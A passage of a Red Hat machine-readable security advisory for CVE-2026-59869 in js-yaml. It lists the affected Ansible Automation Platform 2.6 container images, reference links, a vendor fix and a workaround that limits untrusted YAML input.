"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59869"
},
{
"category": "external",
"summary": "RHBZ#2498122",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498122"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59869",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59869"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59869",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59869"
},
{
"category": "external",
"summary": "https://github.com/nodeca/js-yaml/commit/24f13e79ee1343a7e30bd6f6c9d9cdbf0ac9b2b7",
"url": "https://github.com/nodeca/js-yaml/commit/24f13e79ee1343a7e30bd6f6c9d9cdbf0ac9b2b7"
},
{
"category": "external",
"summary": "https://github.com/nodeca/js-yaml/commit/59423c6f8cdc78742ac00e25a4dd39ef16b702e4",
"url": "https://github.com/nodeca/js-yaml/commit/59423c6f8cdc78742ac00e25a4dd39ef16b702e4"
},
{
"category": "external",
"summary": "https://github.com/nodeca/js-yaml/releases/tag/3.15.0",
"url": "https://github.com/nodeca/js-yaml/releases/tag/3.15.0"
},
{
"category": "external",
"summary": "https://github.com/nodeca/js-yaml/releases/tag/4.3.0",
"url": "https://github.com/nodeca/js-yaml/releases/tag/4.3.0"
},
{
"category": "external",
"summary": "https://github.com/nodeca/js-yaml/security/advisories/GHSA-52cp-r559-cp3m",
"url": "https://github.com/nodeca/js-yaml/security/advisories/GHSA-52cp-r559-cp3m"
}
],
"release_date": "2026-07-08T15:15:54.675000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "To reduce exposure, restrict the processing of untrusted YAML documents by applications that rely on `js-yaml`. Implement robust input validation and sanitization for all YAML data originating from external or untrusted sources. Consider limiting network access to services that parse YAML content to trusted networks or clients through appropriate firewall configurations.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
